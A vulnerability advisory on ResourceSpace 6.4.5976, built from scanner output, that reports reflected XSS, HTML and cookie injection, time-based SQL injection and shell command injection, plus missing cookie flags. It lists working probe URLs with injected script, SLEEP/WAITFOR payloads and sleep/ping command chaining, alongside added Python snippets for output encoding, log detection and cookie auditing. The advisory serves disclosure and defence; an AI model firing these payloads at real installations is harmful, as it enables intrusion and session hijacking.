Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
Injection Vulnerabilities

Author: Adler Freiheit
Discovered: 11 June 2014
Updated: 11 December 2014
Published: 11 December 2014
Vendor: Montala Limited
Vendor url: www.resourcespace.org
Software: ResourceSpace Digital Asset Management Software
Versions: 6.4.5976 and prior
Status: Unpatched

Vulnerable scripts:
/pages/themes.php
/pages/preview.php
/pages/help.php
/pages/search.php
/pages/user_password.php
/pages/user_request.php
(and probably others)

Description:
ResourceSpace is vulnerable to Cross-Site Scripting, and HTML and SQL
injection attacks, and insecure cookie handling. The scripts fail to
properly sanitize user-supplied input and do not check the network
protocol used to access the site.

Vulnerability: SC1414
Name: Cross Site Scripting (XSS)
Type: Application
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 6 Oct 2014
Service: tcp/https:443
Severity: 4
Risk: 40
CVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )
Resolution Effort: 3

Description:
This web application is vulnerable to Cross Site Scripting (XSS).
XSS is caused when an application echoes user-controllable input data
back to the browser without first sanitising or escaping dangerous
characters. Unescaped strings are then interpreted or executed by the
browser as script, just as if they had originated from the web server.
Malicious script is sent by the attacker via the vulnerable web
application and executed in the victim's browser, within the context of
that user, and may be used to steal session information, redirect users
to a malicious site, and even steal credentials in a phishing attack.
Ref: http://www.owasp.org/index.php/Cross_Site_Scripting
http://cwe.mitre.org/data/definitions/79.html

Solution:
Validate all user-controllable input data (hidden fields, URL
parameters, cookie values, HTTP headers etc.) against expected type,
length and, where possible, format and range characteristics. Reject
any data that fails validation.
Sanitise all user-controllable input data (hidden fields, URL
parameters, cookie values, HTTP headers etc.) by converting potentially
dangerous characters (listed below) into HTML entities such as &gt; and
&lt; using output encoding.
By combining proper input validation with effective input sanitisation
and output encoding, Cross Site Scripting vulnerabilities will be
mitigated.
[1] <> (angle brackets)
[2] " (quotation mark)
[3] ' (single apostrophe)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parentheses)
[7] & (ampersand sign)
[8] + (plus sign)
[9] / (forward slash)
[10] | (pipe)
[11] [] (square brackets)
[12] : (colon)

Information
URI: /pages/preview.php
Parameter: sort (GET)
Other Info: "><SCRIPT>alert('SureApp XSS');</SCRIPT>

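An added illustration of the validation and output-encoding advice above, applied to the reflected sort and order_by parameters of /pages/preview.php; this is example code, not ResourceSpace's, and the set of permitted order_by column names is an assumption made for the example:

```python
"""Allow-list validation plus output encoding for the reflected sort and
order_by parameters of /pages/preview.php reported above.

Added illustration, not ResourceSpace code.  The permitted order_by
column names are an assumption made for this example; a real fix would
use the application's own list of sortable fields."""
import html
from urllib.parse import urlencode

SORT_VALUES = {"ASC", "DESC"}
# Assumed column names, not taken from ResourceSpace.
ORDER_BY_VALUES = {"relevance", "date", "title", "resourceid"}


def validate_sort(value) -> str:
    """Return a permitted sort direction, defaulting to DESC."""
    v = (value or "").strip().upper()
    return v if v in SORT_VALUES else "DESC"


def validate_order_by(value) -> str:
    """Return a permitted column name, defaulting to relevance."""
    v = (value or "").strip().lower()
    return v if v in ORDER_BY_VALUES else "relevance"


def build_back_link(params: dict) -> str:
    """Build the 'Back to resource view' anchor safely.

    Two layers: sort and order_by are reduced to allow-listed values,
    then the whole query string is URL-encoded and HTML-escaped before
    it is placed inside the href attribute.  Free-text parameters such
    as search survive, but only in percent-encoded form."""
    query = {
        "ref": params.get("ref") or "",
        "search": params.get("search") or "",
        "offset": params.get("offset") or "",
        "order_by": validate_order_by(params.get("order_by")),
        "sort": validate_sort(params.get("sort")),
        "archive": params.get("archive") or "",
        "k": params.get("k") or "",
    }
    href = "/pages/view.php?" + urlencode(query)
    return ('<a class="enterLink" href="%s">&nbsp;Back to resource view</a>'
            % html.escape(href, quote=True))


def is_safe_attribute(rendered: str) -> bool:
    """Check that no raw quote or angle bracket survived inside the href
    value, i.e. the attribute cannot be closed early by user input."""
    attr = rendered.split('href="', 1)[1].split('">', 1)[0]
    return not any(c in attr for c in '"<>')


if __name__ == "__main__":
    # The reflected payload from the report is neutralised twice over.
    print(build_back_link({"ref": "12", "sort": '504 onerror="alert(504);'}))
```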
Vulnerability: 44967
Name: CGI Generic Command Execution (time-based)
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5

Description:
The remote web server hosts CGI scripts that fail to adequately
sanitize request strings. By leveraging this issue, an attacker may be
able to execute arbitrary commands on the remote host.
Note that this script uses a time-based detection method, which is less
reliable than the basic method.

Solution:
Restrict access to the vulnerable application. Contact the
vendor for a patch or upgrade.

Information:
Using the GET HTTP method, Nessus found that:

+ The following resources may be vulnerable to arbitrary command
execution (time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :

/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26
/pages/themes.php?lastlevelchange=%26%20ping%20n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=%7C%7C%20ping%20n%203%20127.0.0.1%20%26
/pages/themes.php?lastlevelchange=%7C%20ping%20n%203%20127.0.0.1%20%7C

References:
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 74
CWE: 77
CWE: 78

--------------------------------------------------------------------------------

Vulnerability: 43160
Name: CGI Generic SQL Injection (blind, time based)
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 4
Risk: 40
CVSS Base Score: 7.5

Description
By sending specially crafted parameters to one or more CGI scripts
hosted on the remote web server, Nessus was able to get a slower
response, which suggests that it may have been able to modify the
behavior of the application and directly access the underlying
database.
An attacker may be able to exploit this issue to bypass
authentication, read confidential data, modify the remote database, or
even take control of the remote operating system.
Note that this script is experimental and may be prone to false positives.

Solution:
Modify the affected CGI scripts so that they properly escape arguments.

Information:
Using the GET HTTP method, Nessus found that:
+ The following resources may be vulnerable to blind SQL injection
(time based) :
+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='
/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20%20
/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';
/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);
/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);

Clicking directly on these URLs should exhibit the issue:
(you will probably need to read the HTML source)
/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='

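As an added example (not part of the advisory or of the Nessus plugins), a detector that flags the time-based SQL injection probes above and the command injection probes from the previous finding in access-log lines; the log lines are constructed to mirror the reported requests, and the field layout assumed is the combined log format:

```python
"""Detect the time-based SQL injection and command injection probes
listed above in web server access logs.

Added example, not part of the advisory or of Nessus.  The log lines are
constructed to mirror the reported requests; the field layout assumed is
the Apache/nginx combined format."""
import re
from urllib.parse import unquote_plus, urlsplit

# Markers used by the reported probes.  SQL side: MySQL SLEEP(),
# MSSQL WAITFOR DELAY, PostgreSQL pg_sleep().  Shell side: a command
# separator followed by sleep or ping.
SQLI_DELAY = re.compile(r"\b(?:sleep|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
CMD_DELAY = re.compile(r"[;|&]\s*(?:sleep|ping)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_query(query: str) -> list:
    """Split a query string on '&' only and percent-decode each pair.

    Deliberately not parse_qs: older Python versions also split on ';',
    which would cut the WAITFOR and pg_sleep probes in half."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_value(value: str) -> list:
    """Label one decoded parameter value; empty list means no marker."""
    labels = []
    if SQLI_DELAY.search(value):
        labels.append("time-based-sqli")
    if CMD_DELAY.search(value):
        labels.append("command-injection")
    return labels


def scan_request(target: str) -> list:
    """Return (path, parameter, labels) for each suspicious parameter."""
    parts = urlsplit(target)
    findings = []
    for name, value in decode_query(parts.query):
        labels = classify_value(value)
        if labels:
            findings.append((parts.path, name, labels))
    return findings


def scan_log(lines) -> list:
    """Run scan_request over every request line in an access log."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if m:
            findings.extend(scan_request(m.group(1)))
    return findings


# Constructed sample log; the query strings are those reported above.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Nov/2014:01:53:07 +0000] "GET /pages/themes.php?lastlevelchange=1415670787 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Nov/2014:01:53:08 +0000] "GET /pages/themes.php?lastlevelchange=%27%20AND%20SLEEP(3)=%27 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Nov/2014:01:53:09 +0000] "GET /pages/themes.php?lastlevelchange=%27;WAITFOR%20DELAY%20%2700:00:3%27; HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Nov/2014:01:53:10 +0000] "GET /pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Nov/2014:01:53:11 +0000] "GET /pages/themes.php?lastlevelchange=%27;SELECT%20pg_sleep(3); HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for path, name, labels in scan_log(SAMPLE_LOG):
        print(path, name, ",".join(labels))
```

A hit on a parameter is a reason to look at the response time for that request, since a delay of roughly the requested number of seconds is what turns a probe into a confirmed finding.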
References
CWE: 20
CWE: 713
CWE: 722
CWE: 727
CWE: 751
CWE: 77
CWE: 801
CWE: 810
CWE: 89

--------------------------------------------------------------------------------

Vulnerability: 55903
Name: CGI Generic XSS (extended patterns)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 4.3

Description
The remote web server hosts one or more CGI scripts that fail to
adequately sanitize request strings with malicious JavaScript. By
leveraging this issue, an attacker may be able to cause arbitrary HTML
and script code to be executed in a user's browser within the security
context of the affected site. These XSS vulnerabilities are likely to
be 'non-persistent' or 'reflected'.

Solution
Restrict access to the vulnerable application. Contact the vendor for
a patch or upgrade.

Information
Using the GET HTTP method, Nessus found that:
+ The following resources may be vulnerable to cross-site scripting
(extended patterns) :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=504 onerror="alert(504);&archive=&k=">< Back to resource view</a>

/pages/preview.php?sort=&sort=504%20onerror="alert(504);
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=504 onerror="alert(504);&archive=&k=">< Back to resource view</a>

+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=504%20onerror="alert(504);
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=504 onerror="alert(504);&sort=DESC&archive=&k=">< Back to resource view</a>

/pages/preview.php?order_by=&order_by=504%20onerror="alert(504);
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=504 onerror="alert(504);&sort=DESC&archive=&k=">< Back to resource view</a>

+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=504%20onerror="alert(504);&search=&order_by=&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=504 onerror="alert(504);&archive=&k=">< Back to resource view</a>

/pages/preview.php?sort=&sort=504%20onerror="alert(504);&search=&order_by=&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=504 onerror="alert(504);&archive=&k=">< Back to resource view</a>

+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=504%20onerror="alert(504);&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=504 onerror="alert(504);&sort=&archive=&k=">< Back to resource view</a>

Tonbridge & Malling Borough Council Vulnerabilities Report | 5

/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror="alert(504);&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=504 onerror="alert(504);&sort=&archive=&k=">< Back to resource view</a>

Clicking directly on these URLs should exhibit the issue:
(you will probably need to read the HTML source)
/pages/preview.php?sort=504%20onerror="alert(504);
/pages/preview.php?order_by=504%20onerror="alert(504);

References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86

--------------------------------------------------------------------------------

Vulnerability: 49067
Name: CGI Generic HTML Injections (quick test)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0

Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML to be executed
in a user's browser within the security context of the affected site.
The remote web server may be vulnerable to IFRAME injections or
cross-site scripting attacks:
IFRAME injections allow 'virtual defacement' that
might scare or anger gullible users. Such injections
are sometimes implemented for 'phishing' attacks.
XSS are extensively tested by four other scripts.
Some applications (e.g. web forums) authorize a subset
of HTML without any ill effect. In this case, ignore
this warning.

Solution
Either restrict access to the vulnerable application or contact the
vendor for an update.

Information
Using the GET HTTP method, Nessus found that:
+ The following resources may be vulnerable to HTML injection :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<"jfunqd >&archive=&k=">< Back to resource view</a>

+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<"jfunqd%20>
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=<"jfunqd >&sort=DESC&archive=&k=">< Back to resource view</a>

+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<"jfunqd >&archive=&k=">< Back to resource view</a>

+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=<"jfunqd >&sort=&archive=&k=">< Back to resource view</a>

Clicking directly on these URLs should exhibit the issue:
(you will probably need to read the HTML source)
/pages/preview.php?sort=<"jfunqd%20>
/pages/preview.php?order_by=<"jfunqd%20>

References
CWE: 80
CWE: 86

--------------------------------------------------------------------------------

Vulnerability: SC1628
Name: SSL cookie without secure flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1

Description
If the secure flag is not set, then the cookie will be transmitted in
cleartext if the user visits any non-SSL (HTTP) URLs within the
cookie's scope.

Solution
The secure flag should be set on all cookies that are used for
transmitting sensitive data when accessing content over HTTPS.
If cookies are used to transmit session tokens, then areas of the
application that are accessed over HTTPS should employ their own
session handling mechanism, and the session tokens used should never be
transmitted over unencrypted communications.

Information
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:11 GMT
URI: /pages/search.php
Other Info: display=thumbs; httponly
URI: /pages/themes.php
Other Info: saved_themes_order_by=name; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12-Nov-2013 01:53:08 GMT; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12-Nov-2013 01:54:30 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12-Nov-2013 01:53:07 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12-Nov-2013 01:54:25 GMT; httponly

--------------------------------------------------------------------------------

Vulnerability: 44136
Name: CGI Generic Cookie Injection Scripting
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0

Description
The remote web server hosts at least one CGI script that fails to
adequately sanitize request strings with malicious JavaScript.
By leveraging this issue, an attacker may be able to inject arbitrary
cookies. Depending on the structure of the web application, it may be
possible to launch a 'session fixation' attack using this mechanism.
Please note that:
Nessus did not check if the session fixation attack is feasible.
This is not the only vector of session fixation.

Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.

Information
Using the GET HTTP method, Nessus found that:
+ The following resources may be vulnerable to cookie manipulation :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<script>document.cookie="testshay=5812;"</script>
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<script>document.cookie="testshay=5812;"</script>&archive=&k=">&nbsp;Back to resource view</a>

/pages/preview.php?sort=&sort=<script>document.cookie="testshay=5812;"</script>
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<script>document.cookie="testshay=5812;"</script>&archive=&k=">&nbsp;Back to resource view</a>

References
CWE: 472
CWE: 642
CWE: 715
CWE: 722

--------------------------------------------------------------------------------

Vulnerability: 39466
Name: CGI Generic XSS (quick test)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0

Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML and script code
to be executed in a user's browser within the security context of the
affected site.
These XSS are likely to be 'non-persistent' or 'reflected'.

Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.

Information
Using the GET HTTP method, Nessus found that:
+ The following resources may be vulnerable to cross-site scripting
(quick test) :
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<IMG%20SRC="javascript:alert(104);">
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=<IMG SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to resource view</a>

/pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);">
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=<IMG SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to resource view</a>

+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<IMG%20SRC="javascript:alert(104);">
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resource view</a>

/pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">
output
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="/pages/view.php?ref=&search=&offset=&order_by=&sort=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resource view</a>

References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86

--------------------------------------------------------------------------------

Also issues to be aware of:

Vulnerability: SC1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1

Description
When the HttpOnly attribute is set on a cookie, the cookie's value
cannot be read or set by client-side JavaScript.
HttpOnly prevents certain client-side attacks, such as Cross Site
Scripting (XSS), from capturing the cookie's value via an injected
script. When HttpOnly is set, script access to document.cookie results
in a blank string being returned.

Solution
HttpOnly can safely be set for all cookie values, unless the
application has a specific need for script access to cookie contents
(which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting; any XSS vulnerabilities identified must still
be fixed.

Information
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:11 GMT

--------------------------------------------------------------------------------

Vulnerability: SC1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/http:80
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1

Description
When the HttpOnly attribute is set on a cookie, the cookie's value
cannot be read or set by client-side JavaScript.
HttpOnly prevents certain client-side attacks, such as Cross Site
Scripting (XSS), from capturing the cookie's value via an injected
script. When HttpOnly is set, script access to document.cookie results
in a blank string being returned.

Solution
HttpOnly can safely be set for all cookie values, unless the
application has a specific need for script access to cookie contents
(which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting; any XSS vulnerabilities identified must
still be fixed.

Information
URI: /pages/collection_share.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:42 GMT
URI: /pages/contactsheet_settings.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:38 GMT
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:53:05 GMT
URI: /pages/preview.php
Other Info: thumbs=hide; expires=Tue, 08-Aug-2017 01:57:55 GMT
URI: /pages/resource_email.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:57:42 GMT
URI: /pages/view.php
Other Info: thumbs=show; expires=Tue, 08-Aug-2017 01:57:45 GMT
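An added example, not part of the report, that audits Set-Cookie headers for the Secure flag (SC1628) and the HttpOnly flag (SC1629) and re-emits them with the missing attributes; the header strings are constructed from the 'Other Info' values listed in those findings:

```python
"""Audit Set-Cookie headers for the Secure and HttpOnly attributes
flagged in SC1628 and SC1629 above.

Added example, not part of the report.  The headers in OBSERVED are
constructed from the 'Other Info' values the report lists."""


def parse_set_cookie(header: str):
    """Split a Set-Cookie value into (name, value, {attribute: value}).

    Attributes are separated by ';'; the expires value contains a comma
    but never a ';', so a plain split is sufficient."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(header: str, over_https: bool = True) -> list:
    """Return the flags missing from one Set-Cookie header.

    Secure only matters when the cookie is issued over HTTPS, which is
    the case for the tcp/https:443 service in the report; HttpOnly is
    expected regardless of scheme."""
    _, _, attrs = parse_set_cookie(header)
    missing = []
    if over_https and "secure" not in attrs:
        missing.append("Secure")
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    return missing


def harden(header: str, over_https: bool = True) -> str:
    """Re-emit the header with any missing flags appended."""
    flags = audit_cookie(header, over_https)
    return header if not flags else header + "; " + "; ".join(flags)


# Constructed from the cookies listed in the report.
OBSERVED = {
    "/pages/help.php": "thumbs=show; expires=Tue, 08-Aug-2017 01:53:11 GMT",
    "/pages/search.php": "display=thumbs; httponly",
    "/pages/themes.php": "saved_themes_order_by=name; httponly",
    "/pages/user_password.php":
        "starsearch=deleted; expires=Tue, 12-Nov-2013 01:53:08 GMT; httponly",
}


def audit_all(observed: dict, over_https: bool = True) -> dict:
    """Map each URI to the flags its cookie is missing (empty = clean)."""
    return {uri: audit_cookie(h, over_https) for uri, h in observed.items()}


if __name__ == "__main__":
    for uri, missing in audit_all(OBSERVED).items():
        print(uri, "missing:", ", ".join(missing) or "nothing")
        print("  fixed:", harden(OBSERVED[uri]))
```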